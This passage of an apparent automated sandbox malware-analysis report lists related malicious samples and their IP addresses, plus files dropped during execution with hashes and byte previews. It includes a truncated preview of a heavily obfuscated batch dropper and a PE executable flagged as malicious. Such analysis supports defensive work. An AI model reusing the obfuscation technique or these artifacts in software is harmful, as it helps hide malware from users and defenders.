                                                                  List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                  • 199.232.214.172
                                                                  List of required items.vbsGet hashmaliciousUnknownBrowse
                                                                  • 199.232.214.172
                                                                  List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                  • 199.232.214.172
                                                                  TTSIpRHKZz.exeGet hashmaliciousBabadeda, Binder HackToolBrowse
                                                                  • 199.232.214.172
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  SALSGIVERUSsora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                  • 147.160.103.28
                                                                  a4lIk1Jrla.exeGet hashmaliciousNjrat, RevengeRATBrowse
                                                                  • 147.185.221.24
                                                                  W6s1vzcRdj.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.24
                                                                  u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.24
                                                                  aOi4JyF92S.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.24
                                                                  ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.22
                                                                  PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 147.185.221.24
                                                                  a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.24
                                                                  grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 147.185.221.24
                                                                  jSm8N1jXbk.exeGet hashmaliciousS400 RATBrowse
                                                                  • 147.185.221.23
                                                                  No context
                                                                  No context
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):71954
                                                                  Entropy (8bit):7.996617769952133
                                                                  Encrypted:true
                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                  Malicious:false
                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):471
                                                                  Entropy (8bit):7.168966251991555
                                                                  Encrypted:false
                                                                  SSDEEP:12:JuGTFtG5qPGyWFe9GcPVaFH7ydkLALytSr:JRnGINWRcPVahzLALy6
                                                                  MD5:2ACF368122D37891F4EFC709886B793E
                                                                  SHA1:9907A38938BCD709D8317568CCFCFDA1D8C7FFC7
                                                                  SHA-256:5D8BBDD66379C2B0B27D206E70FEF5684043F3006A6049B6B8BD2358622EE1BC
                                                                  SHA-512:936071E89F337C93249F59654145195E6AF1BD6F97FC0554524B966D5B35141583B07811DD857F8E8331AA0AEC3028698E28B9229D7D9DAFC05DFE9B5F87DA02
                                                                  Malicious:false
                                                                  Preview:0..........0.....+.....0......0...0......N"T ....n..........9..20241208190220Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9....n.U_$t...]......20241208190220Z....20241215190220Z0...*.H................:.Y....#@....k.......1.....Kb4.6Etn.>..P.I..!j.....j.^.Zx,rt.W..zS..oH.(.....v..*}.......(p@.aF.0....|1N...0...,...;..ie].](.........*.<..If....@EU...-2.RZ.....Mk...z.&..e2]...L.K%......A6.3...<v,.u.q.S..w...'.L5..Q.LX....'9".7..4%.t...07..i@.....
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):471
                                                                  Entropy (8bit):7.19668826114456
                                                                  Encrypted:false
                                                                  SSDEEP:6:J0MwGGuM8X5o7D82TwrUGu0y9huMO9mCkEngfSqHZRVKv+r3+J/47B4gmnHQggsx:JuG15qPGu0Z9LEfSq5414rmH4tlsVn
                                                                  MD5:E187E7B116D9A73D8DF0591832E43367
                                                                  SHA1:A4E3A64A00BD8C76073C5AC8E6E3B83479D76380
                                                                  SHA-256:27A80B260A2C661B9A5C767441504E5D38DCA79B332328A6171AAEEFB8969406
                                                                  SHA-512:1CCE96BC85FF69244E966A7E5C0F51FE6CD6E10EDDD767385977BBD75ECE957AA1C7C747407D34920E409F0B297ECAA1894F02EE3EEAF20B41DA2266DB7CD481
                                                                  Malicious:false
                                                                  Preview:0..........0.....+.....0......0...0......N"T ....n..........9..20241207190147Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9....e&D.^=.8t.]......20241207190147Z....20241214190147Z0...*.H..............H..e..m..9`Hu.n8I.L ..]t.......m....iMd..+.s...?...........G.s".)|...."..r....C...3.B..6.F.>.XS|l..E.X..{H.]..>p.<z.a......y T.!..yM.2Q@....W.5....yb.G..^.n...A*.=......t..5[...>8.oc........).}6..FbU. =......gq.Z.q....H-o..W.F...@".{...}...x.B..N
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):471
                                                                  Entropy (8bit):7.224046916386193
                                                                  Encrypted:false
                                                                  SSDEEP:12:JuGTFu5qPGJpCFe4DpfrcM3vDjWe4HJIRH5u1NlzotRl:JRwIACLDpDRDye4pIqr6tRl
                                                                  MD5:C776BC45C99B7007A11F27524A5637E3
                                                                  SHA1:D41C9F87705BAB776522CE534AE9BB70DFE8A567
                                                                  SHA-256:ACB01938E3B78AB47BB8C9CFCCD4BD37E9091AC0C3A521568711EB2941870847
                                                                  SHA-512:D3350CF478ADB3431DB65D76F4B872954B2BA99A40F21C4925279F5193AA1F22F72228D4E2231FCEF3782292C1021DAB64BAC3601BC22DFBC0FB7A1354D1068F
                                                                  Malicious:false
                                                                  Preview:0..........0.....+.....0......0...0......N"T ....n..........9..20241208190253Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9...C.P..5/..y.r..P....20241208190253Z....20241215190253Z0...*.H..............*.\C..em....=.YGE.w#*.'/...q|.......=N.n.e..}..........<.iD.......s...'...........z...{P.~..-|..YH1..%.....H:p.m..Ga..p.f\..!q..............].:....7.2>^.4=b..-....Eg.*........g>.1.:. .B{!.....\w..%.0.....p..B.A.......^y^....hv.....@...
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):7796
                                                                  Entropy (8bit):7.971943145771426
                                                                  Encrypted:false
                                                                  SSDEEP:192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
                                                                  MD5:FB60E1AFE48764E6BF78719C07813D32
                                                                  SHA1:A1DC74EF8495C9A1489DD937659B5C2875027E16
                                                                  SHA-256:EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
                                                                  SHA-512:92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
                                                                  Malicious:false
                                                                  Preview:MSCF....t.......,...................I........E.........J.R .pinrules.stl..>N.#..ECK.[.T...O......l.$.)V.a...v.d.H...&.D.YA,(+Y...A.......c]."ka-.XW..I.....w..|..9.........{...|d..v.T..w.TMZ.|...).F.rtAm.....f......T.*.......n.z.:.t&.} EH.S.)2...SP.../~.Q..d..".@.5..r(..M.Zs..~{...>...p.p.^....[/p..~.....@......f..E0....9.i...Ds..^.d...N.R@..P%..9... .4Z)...z..h...@.......C<.]6....([.c=.9..l.....@..4......f.......z.!..0.`Jp.."$I..?`......H...].2...$....9v1./g.&.aIX.A..A.w*..p.*.`r.........'!e.. ..d...H.d.hu`.\!w.Z..E.$....$..|1..@.OC!c.......%.....p.uxC.~@....`...#.~ .P.!.Gb`)i...L..0.-.K.....xRx.e"..@.....5T..JP^.9.....#aH.E.@2..H..f.H..K...+x..$.WM..H}....=....`.PD:.qgn........I.....]uX..q...D...]n.4..0..b!.....m"a.Lz...d..S%P.I11,..^..".+At..To\@K.....c.h.C.....=...H.Xa...r.A.I..@!..0..eV...|.h..$."r..hL9TR..}.v%...4).H..[.....r..|]..+5..Y..I..hN...O=u..8.}U...#S...R..KQ..A..w....X|.....8b...GC.4..h....6gG.>..}.8....!ql..A..1..X.C.q.j....
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):328
                                                                  Entropy (8bit):3.3330420873786126
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKOPK81F9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:my0sDImsLNkPlE99SNxAhUe/3
                                                                  MD5:3401667948CC12F41F01848BA19E61D0
                                                                  SHA1:0AE651232578B685C088934A787EEC1A659D91E7
                                                                  SHA-256:087538B0FB63268B8188833AC70945FDCF951AC80F1F6C3F36D5F14CCD5A1FA8
                                                                  SHA-512:8DBB03F2504C813B4EBDB8C76717A20CA3C69850C0FD84592DF8AF4940A97C670BE2D5A49134084F43E4DCB293F116160E7491C40EFD8984655E1881D6146173
                                                                  Malicious:false
                                                                  Preview:p...... ........J....J..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):412
                                                                  Entropy (8bit):3.694490439804482
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKohj/0smn+EXlRNfOAUMivhClroFFKIhipStaHAaloq09Slscqsn:EjM3TmxMiv8sFFKbpgal7BlSs
                                                                  MD5:626E0E672BA3C985F85B7B28BB8D34C2
                                                                  SHA1:8D5C858293EA4137B5BE2AE1A67E43F19F37DBD5
                                                                  SHA-256:08A0C157B8EA33A5845023CA4F9A1EBE44BB2195B483C25B236749031BF465D9
                                                                  SHA-512:A9EB873056896366F607D3BF90577979918F42938649AAF9869126C8F366891BC98E10D3F0F3B4027240ADBAA898C7E77D694FB3DD98E0DC44884ED2822FB564
                                                                  Malicious:false
                                                                  Preview:p...... ....(.......J..(...................................................#O.. ............J.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.n.5.b.s.K.V.V.V.8.k.d.J.6.v.H.l.3.O.1.J.0.%.3.D...
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):412
                                                                  Entropy (8bit):3.683705379524527
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKNT/Az/scEXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsQ30P7v+eWAkrn:1kMmxMiv8sFFKbpgal7BlD30PLRWAkr
                                                                  MD5:D3FAFBF7544379A9AE5157549B0199A8
                                                                  SHA1:DC7ECC3B41A744B1B922F6FB7FA8DD7F13DDEB45
                                                                  SHA-256:6FF3AE3FA741DF7D560D7ACFA615BDB1BC2881DC43F0BA5352C76825AD5F8B3D
                                                                  SHA-512:C166C0A864EA3FDB277A36B70BA97EF6778CDB6B42CC1E262FFF4AE264FFB374DDD255ACFB03608963CB08A83A40CCB68D0C38A6E1ED8D381E2826B11686A10D
                                                                  Malicious:false
                                                                  Preview:p...... ....(........J..(................................................_..ZN.. .........9..J.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.U.Z.Z.S.Z.E.m.l.4.9.G.j.h.0.j.1.3.P.6.8.w.%.3.D...
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):412
                                                                  Entropy (8bit):3.6876476257832644
                                                                  Encrypted:false
                                                                  SSDEEP:6:kK1s9EsEXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsbhQ6Shlrn:gEDmxMiv8sFFKbpgal7BlwhZg
                                                                  MD5:35926133F95F8BBFFB43102C3168E2BC
                                                                  SHA1:0FB4524F928D031E32D85F29E95DE1895B42EF09
                                                                  SHA-256:28B94C502C35B8ADBC8D2A1B1DA28565B443EA7A508332971BABDBF73CC4DF35
                                                                  SHA-512:696BFA40F968CE8B1EED989899AA52F14B80FB2FFE71E3104BAC700890D9BDC9DB2C1776CD81D26A786D9A3DC5EF1D25F4195B142FB3386A4A3981799B701A1C
                                                                  Malicious:false
                                                                  Preview:p...... ....(....R...J..(.................................................e.#O.. ........k.2.J.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.p.D.q.V.C.b.A.T.U.v.i.Z.V.5.7.H.I.I.u.l.A.%.3.D...
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):330
                                                                  Entropy (8bit):3.3173623510022248
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKYPK81wNSWsCN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:H0FkPlE99Si1QyIeek
                                                                  MD5:0E10E3F4D8C57D97645C65BC511564DC
                                                                  SHA1:C3F59F3F1993251E2EFCEAFF3FA94A55DA8A81E3
                                                                  SHA-256:058FE1D59FAD74F35279273CD7AE56C80E7C90826DB1AA651B1807FEF7145E76
                                                                  SHA-512:01597DE8AADBA1C5FC0497E06C530F94B44FBEEE79B519AEB0434CDFF1252C42015FF365777BDA29F3B707C1CEEA454EFBBAE9975A4528A0C48A2136E186E982
                                                                  Malicious:false
                                                                  Preview:p...... .............J..(....................................................... ........B@!........(....0."....t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):9713
                                                                  Entropy (8bit):4.940954773740904
                                                                  Encrypted:false
                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                                                  MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                                                  SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                                                  SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                                                  SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):2892
                                                                  Entropy (8bit):5.437969087793142
                                                                  Encrypted:false
                                                                  SSDEEP:48:oizsSU4y4RQmFoUeCamfm9qr9t5/78NWR8lgxJZKaVEouYAgwd64rHLjtvk:oizlHyIFKL2O9qrh7KWBJ5Eo9Adrxk
                                                                  MD5:3D05665264FF5F9612A974D7E6FAF75D
                                                                  SHA1:EFAF5F2EB18DE5070947DE4B2B58F6F8ADF8C00E
                                                                  SHA-256:F807ED1F52729FE3DDB61E208FCEA8278FA7A7D6358C21055BC640E53E09A12A
                                                                  SHA-512:F2E2CB6A0248D6186B4EF1FDEFD532D82A663AE3494D6716A80B8134D7B6AEC542D12CD2282F038C6CE33C84E838880CE85927FADB868B46C275D2D806AB18CA
                                                                  Malicious:false
                                                                  Preview:@...e...........................................................H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:DOS batch file, ASCII text, with very long lines (3523), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):7301955
                                                                  Entropy (8bit):6.016918973410356
                                                                  Encrypted:false
                                                                  SSDEEP:49152:afRq7YF410Ckz3qmh8VhdBC6+2u49Gc54h/GD8pWlvdOPX7XM/nTrOslcFMB+Bs5:t
                                                                  MD5:98F30844747B3B14F19B6127DF1765DC
                                                                  SHA1:2441D2660C67E64784C729732553779B952A8296
                                                                  SHA-256:C62DFF3F1B1B032DDB7E089B6E56CFCD27082D62A9627DEC4EC8F2423175B750
                                                                  SHA-512:55521BBF96E79678FAB3EBFE364F3F87CC53080616F4EAD5EF5129B52410FFFA782C541AEE2CF58486E5EB25EFD3FE56EA6C7178D03FA48CD786EA53EF0C478E
                                                                  Malicious:false
                                                                  Preview:@echo off..%CmQiIgrXupacUcKPqvVOFTdvyur%@%zACKdYngEFLgLAMGirTMKNXDBlKJjuJnPwyTNqZVPEkLKOcfhwngAFkLDZi%%oDXjVxrocSTRsYXfCmTMiFCMhDMjlMqNhhHlHbPmxOdoDvOCIeirfvJJ%e%kbsKhdpCfJk%%LyBwHpuBojMOkAgDYILyYjwZwBp%c%NLxLDlWGHUygphNbpEAGWMDwYMsBcCafZJOCLalYEAWekFiQw%%JSaIObhaNQTuDfUsgGskqotCcvPzmtEB%h%HSifqUNuKnufjWR%%SyCymeuzxGtlIOtmrpWm%o%mQLFPGbYxTyYpuVbdSCxJHKBBMVTiNTaEyFHRSwytAaMUntty%%nwtOcFfkedKhPJZytQPnk% %vediHXGotCvXAxGPvaCHO%%NmLqNwTCElacboLUXhDQKiLSjCRDuO%o%CwcrQxrkkuQXjXxvseBcvdYJFASglFqiPAxFYXUxGWsvTkBV%%gyzTMpzysLqEkYEeIhJzSxvkdvyLCPuYXufgQodlYhGlETwYNr%f%dSvTJdpPqQOVCrrGPTyntd%%AKQjFkZAXkErgCAwdBzNvkldUnnGepeRZv%f%jSTJFqpQKYaldoxvLUqcqzNpsWsvHgMrLHrEjSTwftAfTcjrHUtXIsEJeEr%..%XUjElIAwXTlTaUWWYIvqNbOMNOJscHzFAlylkWTlCMuOIA%s%OvILwibUWfwRwYhtptGsPvLMcOjNaGaenSUWuWdwzqCfNewmuseubhhtKVIHY%%TpfsEEelZsqkSzTGZYrWtIBF%e%fKBlzovymwmZ%%ASiitMdRoIAdWKpbTlNAqyTCZzeULGc%t%HExzOkoPBkQcbiDDgwslyyebYFiTHifIFTwrmPnIXYYg%%QBRWAOpnRiiAwBicuiseixhLlrqjJnAAYshdrXgtQuOKoR%l%oeGCPFbAtugLjygDDIICdtfKxcYoN
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36864
                                                                  Entropy (8bit):4.3900594222407125
                                                                  Encrypted:false
                                                                  SSDEEP:384:VZCSSrPcfu1FIyBl3pdSRf+yTq5+9f2sMbRAxzQ1yTkepoeL80bk20OzSIS+gL0i:VZArPDDIulZdSRWfY9f/hngDU2/t7
                                                                  MD5:B943A57BDF1BBD9C33AB0D33FF885983
                                                                  SHA1:1CEE65EEA1AB27EAE9108C081E18A50678BD5CDC
                                                                  SHA-256:878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
                                                                  SHA-512:CB7253DE88BD351F8BCB5DC0B5760D3D2875D39F601396A4250E06EAD9E7EDEFFCD94FA23F392833F450C983A246952F2BAD3A40F84AFF2ADC0F7D0EB408D03C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...GB..........."...0.................. ....@...... ....................................`...@......@............... ............................................................................................................................... ..H............text........ ...................... ..`.rsrc...............................@..@........................................H......................................................................ga..G.*.I..6..+......6.2..5.tK@.g1.9.....Q...@a..W1...}.... .d......</.X....m..Zg.."."^.F..0......G.c.....(D..(....G...u.KM...........D.|/..J3....?.vMl.-.P...)...RZ..-....|.0.x.....D.....>...G...C..e.....IZem...s....|.l~.c........<d.*..y.W..E..2.&c\z..Z.......................................................................................%%........;m2....2m;............................................
                                                                  Process:C:\Windows\System32\cmd.exe
                                                                  File Type:DOS batch file, ASCII text, with very long lines (3523), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):7301955
                                                                  Entropy (8bit):6.016918973410356
                                                                  Encrypted:false
                                                                  SSDEEP:49152:afRq7YF410Ckz3qmh8VhdBC6+2u49Gc54h/GD8pWlvdOPX7XM/nTrOslcFMB+Bs5:t
                                                                  MD5:98F30844747B3B14F19B6127DF1765DC
                                                                  SHA1:2441D2660C67E64784C729732553779B952A8296
                                                                  SHA-256:C62DFF3F1B1B032DDB7E089B6E56CFCD27082D62A9627DEC4EC8F2423175B750
                                                                  SHA-512:55521BBF96E79678FAB3EBFE364F3F87CC53080616F4EAD5EF5129B52410FFFA782C541AEE2CF58486E5EB25EFD3FE56EA6C7178D03FA48CD786EA53EF0C478E
                                                                  Malicious:true
